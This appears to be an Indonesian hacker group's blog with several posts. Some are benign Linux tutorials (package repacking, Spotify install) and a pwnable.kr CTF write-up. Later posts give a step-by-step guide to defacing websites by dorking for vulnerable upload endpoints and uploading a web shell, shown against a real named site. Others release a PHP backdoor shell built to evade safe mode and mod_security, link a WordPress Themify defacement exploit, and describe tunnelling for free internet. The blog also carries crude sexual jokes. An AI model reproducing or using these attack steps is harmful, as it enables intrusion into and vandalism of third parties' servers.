Saturday, May 27, 2017

Cara Repack/Backup Package Yang Telah Terinstal di Linux (Ubuntu)

Cara Repack/Backup Package Yang Telah Terinstal di Linux (Ubuntu)

Cara Repack/Backup Package Yang Telah Terinstal di Linux (Ubuntu)

_Tuan2Fay_ | Garuda Security Hacker ~ Yosshh gw posting lg tutorial,, masih seputar Linux, semoga kalian kaga bosen baca postingan yg kaga jelas ini ^_^ , langsung aja eue tutorialnya..

Step by Step

1. Buka terminal angkot kalian ^_^

2. Kita install dlu dpkg repack,, buat ngerepack package yang telah di instal jadi file .deb
# sudo apt-get install dpkg-repack fakeroot

Cara Repack/Backup Package Yang Telah Terinstal di Linux (Ubuntu)


3. Kalo dah beres instalnya kita buat direktori dlu buat naro file hasil repack nya
# mkdir SerahLo

Cara Repack/Backup Package Yang Telah Terinstal di Linux (Ubuntu)


4. Masuk dlu ke direktori yang barusan ente bikin..
# cd namadirektori/

5. Tinggal di repack aja package nya,, misalnya ane ngerepack mdk3
# sudo dpkg-repack namapackage
# sudo dpkg-repack mdk3

Cara Repack/Backup Package Yang Telah Terinstal di Linux (Ubuntu)

6. Tuh dah beres,, tinggal di cek aja.. simpel kan ??

Ohh iyaa,, mohon maaf klo ane bakal jarang post,, ya palingan seminggu 1x lah,, biar blog nya tetep hidup.. ini gw jg di minta ama tmn buat bikin postingan tentang linux,, lah gw bingung mau apa materi nya,, yaudahlah yang simpel aja :v

Marhaban ya Ramadhan

Greetz to : Yukinoshita 47 | _Tuan2Fay_ | Snooze | OutrageousEngkus | TM_404 | E7B_404 | LuckNut | Cr4bbyP4tty | ShadowHearts | CyberGhost.17 | Lyonc | EvilClown | Mr.Spongebob | D34D_SL33P | | Mr.HzA404EsL | Mr_Viruzer#29 | Loyo-ID | Fazlast | DarkTerrorizt | And All Member of Garuda Security Hacker

Friday, May 26, 2017

Cara Instal Spotify Di Linux (Ubuntu)

Cara Instal Spotify Di Linux (Ubuntu)

Cara Instal Spotify Di Linux (Ubuntu)


_Tuan2Fay_ | Garuda Security Hacker - yosshh balik lagi ama gw orng biasa yang mnecoba sesuatu yang tidak biasa :v ,, siapa bilang Linux itu ribet ?? atau linux kaga user friendly ,, nah kli ini gw bakal ngasih tutorial "Cara Instal Spotify Di Linux (Ubuntu)" , klo tutorial kemaren gw pke os BackBox sekarang gw pake ZorinOS,, supaya cepet move on dari dunia Pentesting :v.. ok langsung aja loncat ke tutorial nya..

Step by Step

1. Download lu Package Spotify Client nya :)
32 Bit => Direct Link
64 Bit => Direct Link

# sudo wget link
# sudo wget http://repository.spotify.com/pool/non-free/s/spotify-client/spotify-client_1.0.55.487.g256699aa-16_i386.deb

Cara Instal Spotify Di Linux (Ubuntu)

2. Pindah direktori ke tempat hasil downloadan nya,,

3. lanjut install aja dah

# dpkg -i namapackage.deb
# dpkg -i spotify-client_1.0.55.487.g256699aa-16_i386.deb


Cara Instal Spotify Di Linux (Ubuntu)

4. Nah klo dah selesai install tinggal buka aja dah,, bisa cek di menu atau buka lewat terminal :)

Cara Instal Spotify Di Linux (Ubuntu)
Cara Instal Spotify Di Linux (Ubuntu)

5. Done :)

Gimana ?? simple kan,, kaga ribet kan ?? User Friendly kan ??
ohh iyaa,, buat kalian yang berdomisili di Bogor,, terus pengen migrasi ke Linux tp bingung gmna cara nya,, bisa kontak saya aja langsung tuan2fayofficial@gmail.com






Greetz to : Yukinoshita 47 | _Tuan2Fay_ | Snooze | OutrageousEngkus | TM_404 | E7B_404 | LuckNut | Cr4bbyP4tty | ShadowHearts | CyberGhost.17 | Lyonc | EvilClown | Mr.Spongebob | D34D_SL33P | | Mr.HzA404EsL | Mr_Viruzer#29 | Loyo-ID | Fazlast | DarkTerrorizt | And All Member of Garuda Security Hacker

Tuesday, May 16, 2017

Cara Menggunakan Internet Gratisan Di Linux (With Tethering)

Cara Menggunakan Internet Gratisan Di Linux (With Tethering)



_Tuan2Fay_ | Garuda Security Hacker - lama kaga ketemu nih ya :v ?? Jangan tanya kenapa gw jarang lagi bikin postingan,, jangakan buat postingan, gw on FB jg dah jarang :v
dan niat gw Pensiun dari dunia Defacer semakin kuat,, kenapa ?? karena rada bosen cuma gitu2 aja,, ngerusak -> Admin nya ngomel -> repeat. Jadi gw nyari sesuatu yg kaga merugikan orang lain aja. Ini tutorial pertama gw tentang Linux :v jadi klo banyak kesalahan mohon maaf ya master :( aku kan newbie yg kaga tau banyak soal Linux.


Bahan-Bahan :

Kalo udah ada ProxyChains kaga usah install lagi.. (karena beberapa distro linux udah ada ProxyChains)
sebelumnnya kalian harus modal dlu buat download bahannya,, klo kaga ada wifi,, ya di HP aja donlot nya,, terus pindahin ke PC/leppy

1. Package ProxyChains -> Download

Step by Step :

Di sini saya pakai Distro Linux BackBox 4.7 (Ubuntu)
sebenernya udah ada proxychains nya tapi gw remove dlu terus install versi terbarunya buat bikin tutorial ini :v
1. Yang jelas dah di download package ProxyChains nya :)

Cara Menggunakan Internet Gratisan Di Linux (With Tethering)



2. Login root lah kntl ^_^
# sudo su

Cara Menggunakan Internet Gratisan Di Linux (With Tethering)


3. Pindah ke direktori file yang tadi dah di Download (kalau gw kaya di Gambar ⇓)
# cd /home/tuan2fay/Downloads/ProxyChains ⇐ Direktori gw naro package ProxyChains

Cara Menggunakan Internet Gratisan Di Linux (With Tethering)

4. Gw lagi males ngetik banyak,, jadi langsung aja
# dpkg -i namafile.deb

Cara Menggunakan Internet Gratisan Di Linux (With Tethering)


5. Tunggu aja ampe beres proses nya,, kalo dah beres kurang lebih kaya gini

Cara Menggunakan Internet Gratisan Di Linux (With Tethering)

6. Ya sesuai judul kita butuh tethering dari HP Android yang dah konek ke Injector,, terserah mau pake HTTP Injector atau yang lainnya,, kalo gw setia pake HTTP Injector, kalo dah konek ke injector di Android ente yang tinggal tethering aja.. terus di Linux nya konekin ke Hotspot ente..

7. Kita setting dlu ProxyChains nya biar bisa Internetan :v
kita pake yg default aja ngedit nya :v
# nano /etc/proxychains.conf
lu edit dah tuh dari socks4 127.0.0.1 (port nya lupa, kaga ke screenshoot pula) jadi socks5 192.168.43.1 1080
1080 = Port lokal, settingan default HTTP Injector,, jadi kaga semua Injector port lokal nya sama.
klo udah ya tinggal di save aja ya,, klo kaga tau pencet aja tombol power PC/Leppy lu :p (pencet CTRL + X → Y → Enter)

Cara Menggunakan Internet Gratisan Di Linux (With Tethering)

8. Cara pake nya gmna ?? gampang kok sloww ^_^
# proxychains <nama program>
Example :
# proxychains firefox
# proxychains apt-get update
# proxychains apt-get install <package>

Cara Menggunakan Internet Gratisan Di Linux (With Tethering)


Oh iyaa,, mungkin gw kaga bakal bikin tutorial depes lagi, jadi.... yaa gitulah pokok nya ^_^
Kalo masih bingung langsung aja kontak ke Garuda Security Hacker Official FP



Greetz to : Yukinoshita 47 | _Tuan2Fay_ | Snooze | OutrageousEngkus | TM_404 | E7B_404 | LuckNut | Cr4bbyP4tty | ShadowHearts | CyberGhost.17 | Lyonc | EvilClown | Mr.Spongebob | D34D_SL33P | | Mr.HzA404EsL | Mr_Viruzer#29 | Loyo-ID | Fazlast | DarkTerrorizt | And All Member of Garuda Security Hacker

GSH Kok Sepi Pada Kemana Aja ?


Kami akan menjawab pertanyaan kalian yang rame pada nanyain kemana aja sih Anggota Garuda Security Hacker kok dah lama gak nongol :v





Kepada Kakek Kami maaf kek kami jarang nongol bukan karena malas-malasan seperti makan, tidur, ama coli doang Semenjak Anniversary GSH ke 4 tahun pada tanggal 8 April 2017 lalu seperti yang kalian ketahui satu persatu member jarang online.

Tiap staff, admin, crew, dan member memiliki kegiatan nya masing-masing di dunia nyata.

Rata-Rata aktivitasnya ada yang sibuk Kerja, Mengelola Bisnis dan Usaha, Sekolah, Kuliah, Ternak Lele, Mulung, Bikin Lagu, Syuting Film dan Lainnya.

Bagi kami Garuda Security Hacker ini hanya sarana kami meluangkan waktu disaat senggang dan sebagai wadah kami menuangkan ide, kreativitas dan hobi kami, wajar aja terlihat berbeda dengan tim-tim underground yang begitu serius ngejar popularitas dan genjot-genjot project nya ya bedanya adalah kami santai dan tidak terlalu serius karena terlalu serius di dunia maya tidak baik buat kesehatan dan dapat mempengaruhi jiwa dan sosial.

Ngapain aja kami ketika sedang tidak beraktivitas di tim ini ?

Sebagian anggota juga ada yang sedang vakum karena lagi wisata kuliner.








Ada juga member yang lagi nunggu perang dunia 3 pecah dan siap-siap jika perang pecah




Ini dokumentasi yukinoshita 47 sedang zeroing sniper nya untuk persiapan jika perang melanda wkwkwkwkwk



Beberapa member-member lainnya juga sibuk nambang bahan coli. Gambar hanya pemanis kalo mau bahan coli yang lebih banyak ya mampir aja ke grup chat kami :p









Itulah aktivitas kami ketika vakum ya joytime and have fun di dunia nyata juga menyenangkan kok.

Tenang aja kami tetap akan menyelesaikan project-project yang tertunda dan yang belum terselesaikan untuk tutorial-tutorial mungkin kami sudah buat mapping nya tinggal implementasi nya aja.

Buat kalian  yang support kami TERIMAKASIH BANYAK ATAS DUKUNGAN KALIAN SEMUA



Greetz to : Yukinoshita 47 | _Tuan2Fay_ | Snooze | OutrageousEngkus | TM_404 | E7B_404 | LuckNut | Cr4bbyP4tty | ShadowHearts | CyberGhost.17 | Lyonc | EvilClown | Mr.Spongebob | D34D_SL33P | | Mr.HzA404EsL | Mr_Viruzer#29 | Loyo-ID | Fazlast | DarkTerrorizt | And All Member of Garuda Security Hacker

Project GSH Media by Anazvr


Yoyoyo Nigga :v kali ini kami akan share project non hacking yaitu CMS Social Media ala Garuda Security Hacker yaitu Project GSH Media karya Anazvr awalnya Anazvr mengabil source code asli nya dari situs yang ia retas dan mengembangkan nya.

Fitur seperti sosial media umumnya dan tampilan seperti film hacker 2016

Penampakan nya seperti gambar dibawah ini


  Kalian mau source code nya buat diuji coba ? Ini link nya : https://github.com/Anazvr/gshmedia

Greetz to : Yukinoshita 47 | _Tuan2Fay_ | Snooze | OutrageousEngkus | TM_404 | E7B_404 | LuckNut | Cr4bbyP4tty | ShadowHearts | CyberGhost.17 | Lyonc | EvilClown | Mr.Spongebob | D34D_SL33P | | Mr.HzA404EsL | Mr_Viruzer#29 | Loyo-ID | Fazlast | DarkTerrorizt | And All Member of Garuda Security Hacker

Sunday, March 26, 2017

[Toddler's Bottle] Pwnable.Kr - FD Write Up



Yoo kembali lagi dengan gw Yukinoshita 47 kali ini gw mau share writeup game hacker ini yang bernama Pwnable.kr :v

sedikit penjelasan Pwnable ini adalah wargame mirip dengan CTF tapi berbeda konsep nya :v 

write up kali ini adalah FD dalam kategori [Toddler's Bottle]

challenge nya adalah

Mommy! what is a file descriptor in Linux?

* try to play the wargame your self but if you are ABSOLUTE beginner, follow this tutorial link: https://www.youtube.com/watch?v=blAxTfcW9VU

ssh fd@pwnable.kr -p2222 (pw:guest)

oke langsung sadja kita ke TKP

pertama-tama konekin dulu ssh nya buat ngakses soal challenge nya :

Yukinoshita47 pwnable # ssh fd@pwnable.kr -p2222

lalu masukkan passwordnya guest

setelah itu

lihat file nya

fd@ubuntu:~$ ls -la


 di situ ada file

drwxr-x---  5 root   fd   4096 Oct 26 03:50 .
drwxr-xr-x 80 root   root 4096 Jan 11 23:27 ..
d---------  2 root   root 4096 Jun 12  2014 .bash_history
-rw-------  1 root   root  128 Oct 26 03:50 .gdb_history
dr-xr-xr-x  2 root   root 4096 Dec 19 01:23 .irssi
drwxr-xr-x  2 root   root 4096 Oct 23 10:38 .pwntools-cache
-r-sr-x---  1 fd_pwn fd   7322 Jun 11  2014 fd
-rw-r--r--  1 root   root  418 Jun 11  2014 fd.c
-r--r-----  1 fd_pwn root   50 Jun 11  2014 flag

dan di file fd.c itu adalah source code nya jadi mari kita lihat source code nya

fd@ubuntu:~$ cat fd.c 

maka akan muncul seperti gambar dibawah ini



berikut source code nya

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
char buf[32];
int main(int argc, char* argv[], char* envp[]){
    if(argc<2){
        printf("pass argv[1] a number\n");
        return 0;
    }
    int fd = atoi( argv[1] ) - 0x1234;
    int len = 0;
    len = read(fd, buf, 32);
    if(!strcmp("LETMEWIN\n", buf)){
        printf("good job :)\n");
        system("/bin/cat flag");
        exit(0);

    }
    printf("learn about Linux file IO\n");
    return 0;


}
 yg jd perhatian gw adalah lihat tulisan yg gw bold itu ya benar bagian

     int fd = atoi( argv[1] ) - 0x1234;
    int len = 0;
    len = read(fd, buf, 32);
    if(!strcmp("LETMEWIN\n", buf)){
        printf("good job :)\n");
        system("/bin/cat flag");
        exit(0);

    }
    printf("learn about Linux file IO\n");
    return 0;


kemudian gw coba eksekusi progam fd nya

fd@ubuntu:~$ ./fd 0x1234
maka akan muncul seperti gambar dibawah ini dan itu tentu saja bukan flag nya :v


solusi nya adalah gw convert 0x1234 dengan bilangan lain seperti gambar dibawah ini


 kemudian gw coba eksekusi menggunakan bilangan desimal

fd@ubuntu:~$ ./fd 4660 kemudian gw tekan enter masih sama yang muncul kalimat learn about Linux file IO

kemudian gw liat di script nya ada tulisan LETMEWIN jd gw coba eksekusi lagi dengan fd@ubuntu:~$ ./fd 4660 kemudian gw tekan enter lalu ketik LETMEWIN lu gw tekan enter bumm flag nya nongol :p wkwkwkwkwk

good job :)
mommy! I think I know what a file descriptor is!!




seperti gambar dibawah ini



flag dari [Toddler's Bottle] FD adalah mommy! I think I know what a file descriptor is!!

sampai jumpa di writeup berikut nya :*


Banyak Anak Underground Yang Bilang CTF itu Copo
Kita Maklumin Aja Karena Otak Nya Berpikiran Sempit 

terlalu serius di dunia maya gak baik lho
 wkwkwkwkwkwkwkwk 

 

Greetz to : Yukinoshita 47 | _Tuan2Fay_ | Snooze | OutrageousEngkus | TM_404 | E7B_404 | LuckNut | Cr4bbyP4tty | ShadowHearts | CyberGhost.17 | Lyonc | EvilClown | Mr.Spongebob | D34D_SL33P | | Mr.HzA404EsL | Mr_Viruzer#29 | Loyo-ID | Fazlast | DarkTerrorizt | And All Member of Garuda Security Hacker

Sunday, March 19, 2017

Deface WordPress Themify Arbitrary File Crot

Deface WordPress Themify Arbitrary File Crot



_Tuan2Fay_ ~ balik lagi sama ane,, -_- karena gw kaga ada kegiatan selain diem di rumah sendirian nunggu emak gw balik dari Yogyakarta jadi gw bikin beginian :v gak guna sihh setidaknya ke-gabutan gw berkurang 15% -_-

Dork & Exploit :

Link Dork & Exploit => Crot Di Sini


CSRF Exploiter :

Link CSRF Exploiter => Crot Lagi
Postname nya : Filedata

Step by Step :

Gw males ngetik panjang panjang jadi gw bikin video aja dah :v Jangan lupa like + subscribe channel yutup gw kuyy :)

Link Video => Crot Di Sini 




Greetz to : Yukinoshita 47 | _Tuan2Fay_ | Snooze | OutrageousEngkus | TM_404 | E7B_404 | LuckNut | Cr4bbyP4tty | ShadowHearts | CyberGhost.17 | Lyonc | EvilClown | Mr.Spongebob | D34D_SL33P | | Mr.HzA404EsL | Mr_Viruzer#29 | Loyo-ID | Fazlast | DarkTerrorizt | And All Member of Garuda Security Hacker

[Release] x48x Mini Shell Backdoor

[Release] x48x Mini Shell Backdoor

[Release] x48x Mini Shell Backdoor

_Tuan2Fay_ ~ Berhubung gw dah males deface,, gw pengen cari kegiatan baru,, selama 2hari lalu gw coba2 recode mini shell Mr Secretz, niat nya gw mah cuma buat sendiri aja kaga gw publish.. tp ngeliat tmn2 gw yang pake mini shell, shell nya suka ketikung :v yodahh gw release aja ini shell

About Shell :

Name : x48x Mini Shell
Fiture :
=> Login Shell (Nyaru Mode)
=> Command Execute
=> Logout Session
=> Auto Create .htaccess & php.ini (For bypass safemode & maybe Mod_Security)
=> Amazing Background

Video Demo :

=> Touch Me Senpai :) <=

Source Code (Download)

=> PASTEBIN <=


Kalo ada yang salah atau para master gak suka,, jangan bully,, ane nubi om gak ada basic coding,, cuma otodidak -_-

Greetz to : Yukinoshita 47 | _Tuan2Fay_ | Snooze | OutrageousEngkus | TM_404 | E7B_404 | LuckNut | Cr4bbyP4tty | ShadowHearts | CyberGhost.17 | Lyonc | EvilClown | Mr.Spongebob | D34D_SL33P | | Mr.HzA404EsL | Mr_Viruzer#29 | Loyo-ID | Fazlast | DarkTerrorizt | And All Member of Garuda Security Hacker

Saturday, March 18, 2017

Deface Array Files Shell Upload Vulnerability

Langsung aja ye gausah banyak basa-basi

Pertama silahkan dorking dulu di google , dork bisa diliht Disini Atau  Disono Cuk

dorking image yah ingat :)


Silahkan klik image dan kemudian silahkan klik open image in new tab


Maka akan jadi seperti ini


Disana terlihat ada link http://upload.studioconex.pl/server/php/files/DSCF2150%20ok%20%281%29.jpg

Lalu kita coba masukkan exploitnya yaitu site.com/server/php/
Sehingga menjadi http://upload.studioconex.pl/server/php/
Jika Vuln akan tampil kurang lebih seperti ini

Silahkan klik gambar untuk memperbesar

atau biasanya juga cuman muncul tulisan {"files":[]} aja , intinya yah sekitaran seperti itu lah , klo not found atau forbidden mendingan tinggalin aja

kemudian kita buka csrf nya Disini

Masukkan link tadi http://upload.studioconex.pl/server/php/ di target
postname ketikkan : files[]

Kemudian klik ok terus pilih shell kamu kemudian upload deh 
Usahakan pakek minishell yah biar meminimalisir kedeteksi sama antivirus web nya, nah untuk minishell bisa download disini


Kalau berhasil maka akan keluar seperti ini 

Klik gambar untuk memperbesar

Yang saya block adalah nama shell nya , ingat ya nggak semua web setelah kkita upload shell, nama shell kita sama dengan nama awal, bisa juga jadi random nama shell kita, jadi kita harus melihatnya dengan cara dilihat pada hasil keluaran setelah upload shell seperti diatas

Shell akses : Klik Disini



Ada Pertanyaan Mengenai POSA ini Yang Tidak Anda Mengerti ? Hubungi Facebook Admin Disini atau Disini Greetz to : Yukinoshita 47 | _Tuan2Fay_ | Snooze | OutrageousEngkus | TM_404 | E7B_404 | LuckNut | Cr4bbyP4tty | ShadowHearts | CyberGhost.17 | Lyonc | EvilClown | Mr.Spongebob | D34D_SL33P | | Mr.HzA404EsL | Mr_Viruzer#29 | Loyo-ID | Fazlast | DarkTerrorizt | And All Member of Garuda Security Hacker